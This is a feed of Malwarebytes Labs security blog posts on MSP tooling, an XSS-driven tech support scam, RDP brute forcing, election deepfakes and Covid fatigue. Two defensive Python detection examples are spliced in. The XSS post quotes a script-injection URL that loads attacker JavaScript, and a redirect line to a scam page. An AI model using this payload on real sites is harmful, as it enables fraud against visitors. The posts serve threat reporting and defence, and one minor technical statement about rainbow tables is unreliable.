Malware Bytes

The value of cybersecurity integration for MSPs

Malware Bytes Security - Thu, 10/22/2020 - 11:17am

For modern Managed Service Providers (MSPs), gone are the days of disparate workflows, and that’s really for the best.

Imagine trying to run a successful MSP business today—finding potential customers, procuring new clients, developing purchase orders, managing endpoints, and sending invoices—all without the help of Remote Monitoring and Management (RMM) and Professional Services Automation (PSA) tools. It would be ludicrous.

Why then should MSPs accept that another critical part of their daily workload does not integrate with their current product workstack—cybersecurity?

The short answer is they shouldn’t. With an increasingly complex threat landscape that includes evolving ransomware strategies and trickier phishing scams, MSPs need to be on their A-game. Further, as Malwarebytes Labs showed, medium-sized and enterprise businesses suffered dramatic hits to their cybersecurity postures due to the coronavirus pandemic, and the small businesses that many MSPs protect are likely suffering similar pains.

The very nature of the MSP business demands integration. MSPs should ask the same from their cybersecurity solutions, allowing them to streamline their endpoint security practice with automated endpoint detection and deployment, advanced remediation, and simplified administration.

Why integration helps MSPs and their clients

MSPs today have likely been bombarded by the same arguments favoring RMM and PSA software—these products save time and make money. RMM tools mean no more driving to a physical site, no more scheduled check-ins where a client may have zero IT issues or a critical IT issue that only drags a team down for the rest of the day, and no more unreliability. Remotely addressing a client’s needs is a necessary component of today’s workload.

PSAs offer similar benefits in different areas. These tools can take disparate data flows and collate them into one source of truth. They can automate the generation and hand-off of data to prevent any human error from, for instance, an MSP’s marketing team to its sales team. These tools can also take vital billing data and transform it into trustworthy invoices, making sure that the countless hours of hard work get counted. And they can document purchase orders and make them easily accessible to every MSP employee that needs them. These tools can, in effect, remove the silos of chaos.

These benefits are obvious, and they help not just MSPs, but the clients that MSPs protect.

Being able to immediately field an IT request ticket from a client helps that client, increases their satisfaction, and lets them get back to their job more quickly. Automatically compiling service agreements for multiple clients means fewer opportunities for lost details or mistakes.

These things just make sense. But for MSPs, one of the most crucial roles they perform for clients can sometimes fall beyond the scope of most PSAs. That’s cybersecurity.

Benefits of cybersecurity integration

Every expert MSP knows that their job is more than just fixing IT issues as they happen. It’s also helping clients prevent computer issues before they can have a chance to occur. This doesn’t just help the clients, either, but it helps the many MSP tech workers already slammed with daily requests.

For an MSP, the more endpoints it manages that are already protected with a strong cybersecurity solution, the more endpoints that MSP won’t have to worry about, which means the more time that employees can devote full, personalized attention to the clients suffering other computer issues.

Unfortunately, while RMM and PSA tools have been the standard for decades, the integration of cybersecurity software into these tools is more recent. For years now, MSPs have sometimes been forced to go back to the disparate setups that their industry helped solve—logging into multiple applications to manage the same endpoint.

It didn’t make sense more than 10 years ago and it doesn’t make sense today.

MSPs should consider cybersecurity solutions that integrate directly with their PSA and RMM tools to prevent this repeated splintering of a workload.

Further, having an integrated cybersecurity solution can help an MSP better protect its clients. The integration will allow an MSP to more easily recommend that cybersecurity solution for clients when drafting up service agreements, and a protected client is just as important for the client as it is for the MSP helping them.

After all, so much of the job is cybersecurity, and that means protecting an endpoint before an attack hits, not just after.

The right, always-on, integrated cybersecurity solution will protect clients and their endpoints from disruptive ransomware attacks, sneaky phishing scams, unsafe websites injected with harmful code like credit card skimmers, and dangerous attachments sent through malicious emails. And when something does sneak through? MSPs can then easily rely on their RMM and PSA platforms to get a master-level view of what’s gone wrong, addressing and fixing the issue without having to navigate separate applications with potentially different logins, user interfaces, and data export settings.

There’s no reason to go back to disparate workflows. The MSP industry has been there, and it’s rightfully moved beyond it.

It should do the same when picking a cybersecurity solution for both itself and its clients.

The post The value of cybersecurity integration for MSPs appeared first on Malwarebytes Labs.


XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Malware Bytes Security - Wed, 10/21/2020 - 4:41pm

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a shortened URL.

The threat actor is using the URL shortener to craft the first stage of redirection. In total, we catalogued 50 different links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?nr=855-472-1832&');

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.
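To make the reflected-XSS pattern above concrete from the defender's side, here is an added example (not code from the Malwarebytes post or from the affected site). It decodes a search URL of the same shape, shows what an unescaped reflection would load versus an HTML-escaped one, and flags access-log lines whose query parameters carry script injection. The hostnames, log lines and parameter values are constructed for illustration.

```python
"""Reflected-XSS check for search URLs shaped like the rpp[.]pe one above.

Added example, not the site's or the post's code. The sample URL and log
lines are constructed; hostnames are placeholders, not the real campaign.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Markers that should never appear in a decoded search term. Kept narrow on
# purpose: the goal is to spot the pattern from the post, not to be a WAF.
_SCRIPT_MARKERS = re.compile(r"<\s*script\b|</\s*script\s*>|javascript\s*:", re.I)
_SRC_ATTR = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
_HOST = re.compile(r"https?://([^/?#]+)", re.I)
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed: same structure as the abused URL, with placeholder hosts.
SAMPLE_URL = ("https://news.example/buscar?q=hoy%3Cscript%20src=%27https://attacker.example"
              "/210c/?x.js%27%3E%3C/script%3E&fbclid=abc")

# Constructed common-log-format lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2020:10:00:01 +0000] "GET /buscar?q=elecciones HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Oct/2020:10:00:07 +0000] "GET /buscar?q=hoy%3Cscript%20src=%27'
    'https://attacker.example/210c/?x.js%27%3E%3C/script%3E&fbclid=abc HTTP/1.1" 200 5300',
    # double-encoded payload: %253C decodes to %3C, then to '<'
    '203.0.113.12 - - [21/Oct/2020:10:00:09 +0000] "GET /buscar?q=%253Cscript%253Ealert(1)'
    '%253C/script%253E HTTP/1.1" 200 5100',
]


def decoded_params(url: str) -> dict:
    """Return {param: [values]} with percent-encoding decoded twice (catches double encoding)."""
    query = urlsplit(url).query
    return {k: [unquote(v) for v in vs]
            for k, vs in parse_qs(query, keep_blank_values=True).items()}


def injected_params(url: str) -> list:
    """Names of query parameters whose decoded value contains script injection."""
    return [k for k, vs in decoded_params(url).items()
            if any(_SCRIPT_MARKERS.search(v) for v in vs)]


def external_script_srcs(query_value: str) -> list:
    """Hosts that an unescaped reflection of this value would load <script> from."""
    hosts = []
    for src in _SRC_ATTR.findall(query_value):
        m = _HOST.match(src)
        hosts.append(m.group(1) if m else src)
    return hosts


def render_search_header(query_value: str, escape: bool) -> str:
    """Mimic a results-page header that reflects the query; escape=False is the bug."""
    shown = html.escape(query_value, quote=True) if escape else query_value
    return f"<h1>Results for: {shown}</h1>"


def flag_log_lines(lines) -> list:
    """(line_number, [params]) for access-log lines whose request carries script injection."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if m:
            bad = injected_params(m.group(1))
            if bad:
                hits.append((n, bad))
    return hits


if __name__ == "__main__":
    q = decoded_params(SAMPLE_URL)["q"][0]
    print("injected params:", injected_params(SAMPLE_URL))
    print("would load script from:", external_script_srcs(q))
    print("unsafe:", render_search_header(q, escape=False))
    print("safe:  ", render_search_header(q, escape=True))
    print("flagged log lines:", flag_log_lines(SAMPLE_LOG))
```

Escaping the reflected value on output is what closes the hole; the log check is only there to surface attempts while the fix is pending.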

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:


Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:


We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

Cloaking domains

Browlock domains

Phone numbers

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.


Brute force attacks increase due to more open RDP ports

Malware Bytes Security - Tue, 10/20/2020 - 8:00am

Leaving your back door open while you work from home may be something you do without a second thought, but having unnecessary ports open on your computer is a security risk that is often underestimated. That’s because an open port can be subject to brute force attacks.

What are brute force attacks?

A brute force attack is one in which an attacker tries every way they can think of to get in, up to and including throwing the kitchen sink at it. When the goal is to log in to your system, they will try endless combinations of usernames and passwords until one works.

Brute force attacks are usually automated, so they don’t cost the attacker much time or energy, certainly not as much as individually working out how to access a remote system. Based on a port number or another system-specific property, the attacker picks the target and the method and then sets the brute force application in motion. They can then move on to the next target and will be notified when one of the systems has swallowed the hook.

Brute force methods

When trying to gain access to a remote system, an attacker will use one of the following types of attack:

  • Reverse brute force attack. This type uses a common password or collection of passwords against many possible usernames. Sometimes the attacker may have an idea about the username or a part of it. For example, they may know that a specific organization uses {first name}@{organization} as the default username for its employees. The attacker can then try a specific list of usernames with random passwords.
  • Credential stuffing is a type of attack where the criminal has a database of valid username and password combinations (usually stolen from other breaches) and tries all of these combinations on different systems. This is why it is never a good idea to reuse your passwords.
  • A hybrid brute force attack starts with the most feasible combinations and then keeps on trying from there. It often uses a dictionary attack, where the application tries usernames or passwords taken from a dictionary of possible strings or phrases.
  • Rainbow table attacks only work when the attacker has some knowledge about the password they are trying to guess. In these attacks rainbow tables are used to recover a password based on its hash value. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database.

Brute forcing RDP ports

RDP attacks are one of the main entry points for targeted ransomware operations. As ransomware attacks become more targeted to increase their effectiveness, the Remote Desktop Protocol (RDP) has become one of the primary attack vectors. Remote desktop is exactly what the name implies: an option to remotely control a computer system. It almost feels as if you were actually sitting behind that computer, which is exactly what makes an attacker with RDP access so dangerous.

Because of the current pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened, not only to let the workforce access company resources from home, but also to let IT staff troubleshoot problems on the workers’ devices. Many enterprises rely on tech support teams using RDP to troubleshoot problems on employees’ systems.

But ransomware, although prevalent, is not the only reason for these types of attacks. Cybercriminals can also install keyloggers or other spyware on target systems to learn more about the organization they have breached. Other possible objectives might be data theft, espionage, or extortion.

Protect against brute force attacks

We’ve posted recommendations to protect against RDP attacks before. You can read more details in that post but basically the protection measures come down to:

  • Limit the number of open ports
  • Restrict the access to those that need it
  • Enhance security of the port and the protocol

The same basic security measures apply to other ports. In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets. In contrast, a port that rejects connections or ignores all packets is a closed port. The fewer open ports you have facing the internet, the safer you are. Limiting the number of open ports is a good start, but closing all of them is almost never feasible.

For the ports that need to remain open and where you do expect visitors, it’s a good idea to disable legacy usernames, rotate passwords, and use 2FA if you can.

Security software guarding the entire network should raise alarm bells when a large number of attempts is detected. Anything that behaves like a brute force attack will look so different from normal login attempts that blocking it shouldn’t be a problem. When a brute force attacker gets locked out for a few minutes after a few failed attempts, this slows them down a lot and gives you ample opportunity to take corrective and defensive measures.
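The threshold-and-lockout logic described above, as an added example that is not code from the Malwarebytes post. It replays constructed failed-logon records shaped like Windows Security event 4625 (logon type 10 is RemoteInteractive, i.e. RDP; status 0xC000006A is a wrong password, 0xC0000064 an unknown user), counts failures per source address in a short window, and locks the address out for a few minutes once the threshold is hit. The thresholds, timestamps, addresses and usernames are assumptions chosen for illustration.

```python
"""Brute-force detection with a temporary lockout for RDP logon failures.

Added example, not from the Malwarebytes post. Records are constructed and
mimic the fields of Windows Security event 4625; all values are made up.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5               # failures inside WINDOW that trigger a lockout (assumed)
WINDOW = timedelta(minutes=2)    # sliding window for counting failures (assumed)
LOCKOUT = timedelta(minutes=15)  # how long a source stays blocked (assumed)
RDP_LOGON_TYPE = 10              # RemoteInteractive: logon over RDP

# Constructed 4625-style records: (timestamp, source_ip, username, logon_type, status)
SAMPLE_EVENTS = [
    ("2020-10-20T08:00:00", "192.0.2.10",   "jdoe",          10, "0xC000006A"),  # one typo by a real user
    ("2020-10-20T08:00:05", "198.51.100.7", "administrator", 10, "0xC000006A"),
    ("2020-10-20T08:00:06", "198.51.100.7", "administrator", 10, "0xC000006A"),
    ("2020-10-20T08:00:07", "198.51.100.7", "admin",         10, "0xC0000064"),
    ("2020-10-20T08:00:08", "198.51.100.7", "admin",         10, "0xC0000064"),
    ("2020-10-20T08:00:09", "198.51.100.7", "administrator", 10, "0xC000006A"),  # 5th failure: lockout
    ("2020-10-20T08:00:10", "198.51.100.7", "administrator", 10, "0xC000006A"),  # blocked
    ("2020-10-20T08:00:11", "198.51.100.7", "guest",         10, "0xC000006A"),  # blocked
    ("2020-10-20T08:03:00", "203.0.113.4",  "svc",            2, "0xC000006A"),  # local logon, ignored
    ("2020-10-20T08:16:00", "198.51.100.7", "administrator", 10, "0xC000006A"),  # lockout expired
]


class RdpBruteForceMonitor:
    """Counts RDP logon failures per source and enforces a temporary lockout."""

    def __init__(self, threshold=FAIL_THRESHOLD, window=WINDOW, lockout=LOCKOUT):
        self.threshold, self.window, self.lockout = threshold, window, lockout
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self.locked_until = {}               # ip -> datetime when the lockout ends

    def is_locked(self, ip, now):
        if isinstance(now, str):
            now = datetime.fromisoformat(now)
        until = self.locked_until.get(ip)
        return until is not None and now < until

    def observe(self, ts, ip, user, logon_type, status):
        """Feed one record; returns 'ignored', 'blocked', 'lockout' or 'ok'."""
        now = datetime.fromisoformat(ts)
        if logon_type != RDP_LOGON_TYPE:
            return "ignored"                 # only RDP failures are scored here
        if self.is_locked(ip, now):
            return "blocked"                 # attempt arrived during an active lockout
        recent = self.failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()                 # drop failures older than the window
        if len(recent) >= self.threshold:
            self.locked_until[ip] = now + self.lockout
            recent.clear()                   # start counting afresh after the lockout
            return "lockout"
        return "ok"


def replay(events, monitor=None):
    """Run records through a monitor; returns ({verdict: count}, [(ip, lockout_time)])."""
    monitor = monitor or RdpBruteForceMonitor()
    counts = defaultdict(int)
    lockouts = []
    for rec in events:
        verdict = monitor.observe(*rec)
        counts[verdict] += 1
        if verdict == "lockout":
            lockouts.append((rec[1], rec[0]))
    return dict(counts), lockouts


if __name__ == "__main__":
    summary, locked = replay(SAMPLE_EVENTS)
    print("verdicts:", summary)
    print("lockouts:", locked)
```

A single mistyped password from a real user never reaches the threshold, while the burst from one address is cut off after five failures and every attempt during the lockout is dropped without being scored.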

It’s a numbers game

Many open ports can be used in a brute force attack, but RDP ports are the most desirable for anyone trying to gain access. RDP is easier because the attacker may have a reasonable idea about the username and only needs to brute force the password. It also offers a successful attacker a good chance to infiltrate the organization’s network further.

As mentioned earlier, the shift to working from home has caused a big rise in the number of open RDP ports around the globe. The number of RDP ports exposed to the Internet grew from about three million in January 2020 to over four and a half million in March. At Malwarebytes we noticed a similar surge in compromised servers that are used to run brute force tools or scan the Internet for vulnerable ports. Malwarebytes protects its customers by blocking the traffic from these IP addresses.

And please don’t think this can’t happen to your organization. We’ve seen high profile companies fall victim to ransomware where the suspected point of entry was an open RDP port.

Stay safe everyone!

The post Brute force attacks increase due to more open RDP ports appeared first on Malwarebytes Labs.


A week in security (September 12 – September 18)

Malware Bytes Security - Mon, 10/19/2020 - 2:28pm

Last week on Malwarebytes Labs, we looked at journalism’s role in cybersecurity on our Lock and Code podcast, gave tips for safer shopping on Amazon Prime day, and discussed an APT attack springing into life as Academia returned to the real and virtual campus environment. We also dug into potential FIFA 21 scams, the return of QR code scams, Covid fatigue, and the absence of Deepfakes from the 2020 US elections.

Other cybersecurity news

  • Coronavirus SMS spoof risk: Researcher warns that genuine messages can be impersonated (Source: The Register)

Stay safe, everyone!

The post A week in security (September 12 – September 18) appeared first on Malwarebytes Labs.


Deepfakes and the 2020 United States election: missing in action?

Malware Bytes Security - Fri, 10/16/2020 - 11:00am

If you believe reports in the news, impending deepfake disaster is headed our way in time for the 2020 United States election. Political intrigue, dubious clips, mischief and mayhem were all promised. We’ll need to be careful around clips of the President issuing statements about being at war, or politicians making defamatory statements. Everything is up for grabs, and in play, or at stake. Then, all of a sudden…it wasn’t.

Nothing happened. Nothing has continued to happen. Where did our politically charged deepfake mayhem go to? Could it still happen? Is there time? With all the increasingly surreal things happening on a daily basis, would anybody even care?

The answer is a cautious “no, they probably wouldn’t.” As we’ve mentioned previously, there are two main schools of thought on this. Shall we have a quick refresher?

Following the flow

Stance 1: Catastrophe and chaos rain down from the heavens. The missiles will launch. Extreme political shenanigans will cause skulduggery and intrigue of the highest order. Democracy as we know it is imperilled. None of us will emerge unscathed. Deepfakes imperil everything.

Stance 2: Deepfakes have jumped the shark. They’d have been effective political tools when nobody knew about them. They’re more useful for subversive influence campaigns off the beaten track. You have to put them in the places you least expect, because people quite literally expect them. They’re yesterday’s news.

Two fairly diverse stances, and most people seem to fall in one of the two camps. As far as the US election goes, what is the current state of play?

2020 US election: current state of play

Imagine our surprise when instead of deepfaked election chaos, we have a poorly distorted gif you can make on your phone. It’s heralded as the first strike of deepfakes “for electioneering purposes”.

It’s dreadful. Something you’d see in the comment section of a Myspace page, as pieces of face smear and warp this way and that. People are willing to call pretty much anything a deepfake to add weight to their points. The knock-on effect of this is overload and gradual disinterest due to hype. Things many would consider a deepfake are turned away at the door as a result of everything in sight being called a deepfake.

This is a frankly ludicrous situation. Even so, outside of the slightly tired clips we’ve already seen, there doesn’t appear to be any election inroad for scammers or those up to no good.

What happened to my US election deepfakes?

The short answer is people seem to be much more taken with pornographic possibilities than bringing down Governments. According to Sensity data, the US is the most heavily targeted nation for deepfake activity. That’s some 45.4%, versus the UK in second place with just 10.4%, South Korea with 9.1%, and India at 5.2%. The most popular targeted sector is entertainment with 63.9%, followed by fashion at 20.4%, and politics with a measly 4.5%.

We’ve seen very few (if any) political deepfakes aimed at South Korean politicians. For all intents and purposes, they don’t exist. What there is an incredible amount of, are pornographic fakes of South Korean K-Pop singers shared on forums and marketplaces. This probably explains South Korea’s appearance in third place overall and is absolutely contributing to the high entertainment sector rating.

Similarly adding to both US and entertainment tallies, are US actresses and singers. Again, most of those clips tend to be pornographic in nature. This isn’t a slow trickle of generated content. It’s no exaggeration to say that one single site will generate pages of new fakes per day, with even more in the private/paid-for sections on their forums.

This is awful news for the actresses and singers currently doomed to find themselves uploaded all over these sites without permission. Politicians, for the most part, get off lightly.

What are we left with?

Besides the half dozen or so clips from professional orgs saying “What if Trump/Obama/Johnson/Corbyn said THIS” with a clip of said politician saying it (and they’re not that great either), it’s basically amateur hour out there. There’s a reasonably consistent drip-feed of parody clips on YouTube, Facebook, and Twitter. It’s not Donald Trump declaring war on China. It isn’t Joe Biden announcing an urgent press briefing about Hillary Clinton’s emails. It’s not Alexandria Ocasio-Cortez telling voters to stay home because the local voting station has closed.

What it is, is Donald Trump and Joe Biden badly lip-syncing their way through Bohemian Rhapsody on YouTube. It’s Trump and Biden talking about a large spoon edited into the shot with voices provided by someone else. I was particularly taken by the Biden/Trump rap battle doing the rounds on Twitter.

As you may have guessed, I’m not massively impressed by what’s on offer so far. If nothing else, one of the best clips for entertainment purposes I’ve seen so far is from RT, the Russian state-controlled news network.

Big money, minimal returns?

Consider how much money RT must have available for media projects, and what they could theoretically sink into something they clearly want to make a big splash with. And yet, for all that…it’s some guy in a Donald Trump wig, with an incredibly obviously fake head pasted underneath it. The lips don’t really work, the face floats around the screen a bit, evidently not sharing the same frame of reference as the body. The voice, too, has a distinct whiff of fragments stitched together.

So, a convincing fake? Not at all. However, is that the actual aim? Is it deliberately bad, so they don’t run a theoretical risk of getting into trouble somehow? Or is this quite literally the best they can do?

If it is, to the RT team who put it together: I’m sorry. Please, don’t cry. I’m aiming for constructive criticism here.

They’re inside the walls

Curiously, instead of a wave of super-dubious deepfakes making you lose faith in the electoral system, we’ve ended up with…elected representatives slinging the fakes around instead.

By fakes, I don’t mean typical “cheapfakes”, or photoshops. I mean actual deepfakes.

Well, one deepfake. Just one.

“If our campaign can make a video like this, imagine what Putin is doing right now”

Bold words from Democratic candidate Phil Ehr, in relation to a deepfake his campaign team made showing Republican Matt Gaetz having a political change of heart. He wants to show how video and audio manipulation can influence elections and other important events.

Educating the public in electioneering shenanigans is certainly a worthwhile goal. Unfortunately, I have to highlight a few problems with the approach:

  1. People don’t watch things from start to finish. Whole articles go unread beyond the title and maybe the first paragraph. TV shows progress no further than the first ad break. People don’t watch ad breaks. It’s quite possible many people will get as far as Matt Gaetz saying how cool he thinks Barack Obama is, then abandon ship under the impression it was all genuine.
  2. “If we can make a video like this” implies what you’re about to see is an incredible work of art. It’s terrible. The synthetic Matt Gaetz looks like he wandered in off the set of a Playstation 3 game. The voice is better, but still betrayed by that halting, staccato lilt so common in audio fakery. One would hope the visuals being so bad would take care of 1), but people not really paying attention or with a TV on in the background are in for a world of badly digitised hurt.

An acceptable use of technology?

However you stack this one up, I think it’s broadly unhelpful to normalise fakes in this way during election cycles regardless of intention. Note there’s also no “WARNING: THIS IS FAKE” type message at the start of the clip. This is bad, considering you can detach media from Tweets and repurpose.

It’s the easiest thing in the world to copy the code for the video and paste it into your own Tweet minus his disclaimer. You could just as easily download it, edit out the part at the end which explains the purpose, and put it back on social media platforms. There’s so many ways you can get up to mischief with a clip like this it’s not even funny.

Bottom line: I don’t think this is a good idea.

Fakes in different realms

Other organisations have made politically-themed fakes to cement the theoretical problems posed by deepfakes during election time, and these ones are actually quite good. You can still see the traces of uncanny valley in there though, and we must once again ask: is it worth the effort? When major news cycles rotate around things as basic as conspiracy theories and manipulation, perhaps fake Putin isn’t the big problem here.

If you were in any doubt as to where the law enforcement action is on this subject: it’s currently pornography. Use of celebrity faces in deepfakes is now officially attracting the attention of the thin blue line. You can read more on deepfake threats (political or otherwise) in this presentation by expert Kelsey Farish.

Cleaning up the house

That isn’t to say things might not change. Depending on how fierce the US election battle is fought, strange deepfake things could still be afoot at the eleventh hour. Whether it makes any difference or not is another thing altogether, and if low-grade memes or conspiracy theories are enough to get the job done then that’s what people will continue to do.

Having said that: you can keep a watchful eye on possible foreign interference in the US election via this newly released attribution tracker. Malign interference campaigns will probably continue as the main driver of GAN-generated imagery. Always be skeptical, regardless of suspicions over AI involvement. The truth is most definitely out there…it just might take a little longer to reach than usual.

The post Deepfakes and the 2020 United States election: missing in action? appeared first on Malwarebytes Labs.


How Covid fatigue puts your physical and digital health in jeopardy

Malware Bytes Security - Thu, 10/15/2020 - 11:00am

After six months of social distancing, sheltering in place, working from home, distance learning, mask-wearing, hand-washing, and plenty of hand-wringing, people are pretty damn tired of COVID-19. And with no magic bullet (yet) and no end in sight, annoyance has turned into exasperation and even desperation.

Doctors and mental health professionals call this Covid fatigue.

Covid fatigue, not to be confused with fatigue as a symptom of the COVID-19 infection, can be characterized by denial, defeatism, and careless or reckless behavior in response to feeling overwhelmed and exhausted by a constant stream of pandemic-related information. And since COVID-19’s impact on our lives has been both profound and long-lasting, the fatigue is further pronounced by such prolonged exposure to intense stress. Conflicting information about the seriousness of the virus does little to provide relief. Instead, emotions are extra muddied by uncertainty about how stressed we should really be feeling.

Those of us in cybersecurity recognize this emotional response well. We’ve seen it play out in the digital realm in the form of security fatigue and alert fatigue, or what some doctors call “caution fatigue.” And we understand that if it isn’t addressed, it can lead to dangerous choices for the health and safety of people in the real world and online.

COVID-19 has upended nearly every facet of our lives, driving us into the open arms of the Internet like never before. Yet, as we struggle with anxiety and burnout related to the pandemic, our fatigue spills over into our online behavior. And with so many working and schooling from home, the stakes have never been higher.

So, when we see users exhibiting classic symptoms of Covid fatigue, security fatigue, or other caution fatigue, we feel their pain but recognize that this behavior can’t go on unchecked. If you think that you, your friends and family, or coworkers might be experiencing Covid fatigue, read on to learn how to recognize the symptoms, why they are dangerous, and what can be done to fight against it.

What is Covid fatigue?

To understand Covid fatigue, it helps to first zoom out and consider that fatigue is a natural response to any ongoing stressful situation or threat. When you couple that with the need to take specific actions to protect against that threat, you get caution fatigue. In an interview for a WebMD special report, Jacqueline Gollan, Associate Professor of Psychiatry and Behavioral Science at Northwestern’s Feinberg School of Medicine, explains what she means by the term caution fatigue:

“[Caution fatigue] is really low motivation or interest in taking safety precautions. It occurs because the constant state of being [on] alert for a threat can activate a stress hormone called cortisol, and that can affect our health and our brain function…When we’re subjected to high levels of stress, we start to desensitize to that stress. And then we begin to pay less attention to risky situations.”

Caution fatigue, then, can apply to numerous situations where individuals are under siege for an extended period of time and grow tired of being required to employ protective measures. This is especially true when the threat is not perceived as imminent or direct, and even more prominent when the threat is invisible. Other factors that increase caution fatigue include:

  • Lack of transparency into the threat or the reasons for the restrictions
  • Unfair or overly complicated restrictions or recommendations for safety precautions
  • Inconsistent actions and mixed messages about which measures are effective
  • Unpredictable changes to safety measures, including using subjective criteria to alter directions

Looking at this list in the context of the coronavirus pandemic, it appears we’ve checked off all the boxes, turning what was strong public support for COVID-19 response strategies into a collective case of the Mondays. According to an October report by the World Health Organization (WHO), pandemic fatigue has reached over 60 percent in some parts of Europe. In the United States, a July 2020 Kaiser Family Foundation poll found that 53 percent of Americans believed the pandemic had harmed their mental health.

WHO says that Covid fatigue is expressed through an increasing number of people not sufficiently following recommendations and restrictions, decreasing their effort to stay informed about the pandemic, and having lower risk perceptions related to COVID-19. Previously effective core messages about washing hands, wearing face masks, practicing proper hygiene, and maintaining physical distance may now be lost in the shuffle. Instead, vigilance is replaced by denial (I won’t get infected) or nihilism (we’re all screwed anyway, so I might as well do what I want).

What does Covid fatigue have to do with cybersecurity?

Covid fatigue shares characteristics with another form of fatigue that has long plagued the cybersecurity industry: security fatigue. In 2017, the National Institute of Standards and Technology (NIST) published a study describing security fatigue as the threshold at which users find it too hard or burdensome to maintain security, a phenomenon affecting 63 percent of its participants.

The NIST report went further to say, “People are told they need to be constantly on alert, constantly ‘doing something,’ but they are not even sure what that something is or what might happen if they do or do not do it.”

Security fatigue and its cousin alert fatigue (which technicians are likely already familiar with) prevent users from taking definitive steps to protect themselves while connected to the Internet. Every news story on ransomware or major breach of personally identifiable information (PII) or cyberattack by a nation-state comes with its own set of “here’s how to protect against this” steps to follow.

Some of those instructions may be complex or incredibly specific, contributing to confusion (especially for those who aren’t tech savvy). Likewise, the constant pinging from alert notifications on security software may result in IT teams dismissing those alerts altogether.

Although there have been efforts to reduce security and alert fatigue, they likely make themselves known on a regular basis to anyone working in IT and security. For other users, security fatigue might flow as an undercurrent or barely register. But when you add Covid fatigue to the recipe, you get a dangerous cocktail of weary indifference.

Now, those with Covid fatigue aren’t just endangering themselves by ignoring best health practices and tuning out the latest news. They’re also letting their fatigue-influenced behavior spill over into other areas, including conducting business (or pleasure) online.

Because COVID-19 has forced much of the globe to spend a lot more time online, it has opened up the floodgates for cybercriminal activity, misinformation, and digital infection. Here, at the crossroads of Covid, security, and alert fatigue, people might find themselves in just as much danger on the Internet as they would be at a packed rally of maskless, cheering crowds.

Caroline Wong, CSO of pentest-as-a-service company Cobalt, recently spoke to Malwarebytes employees at a virtual fireside chat about Covid fatigue.

“One of the things that I worry about the most is anxiety and burnout and what that means for human error,” she said. “When we’re anxious, maybe we’re more likely to fall for a phishing scam. When I’m burnt out, maybe I’m more likely to purposefully or accidentally take some kind of a shortcut. Every behavior of an employee affects the security posture of the company.”

And behaviors have changed drastically for both users and cybercriminals since the onset of COVID-19. Here are a few examples of how threat actors are taking advantage of fatigued users:

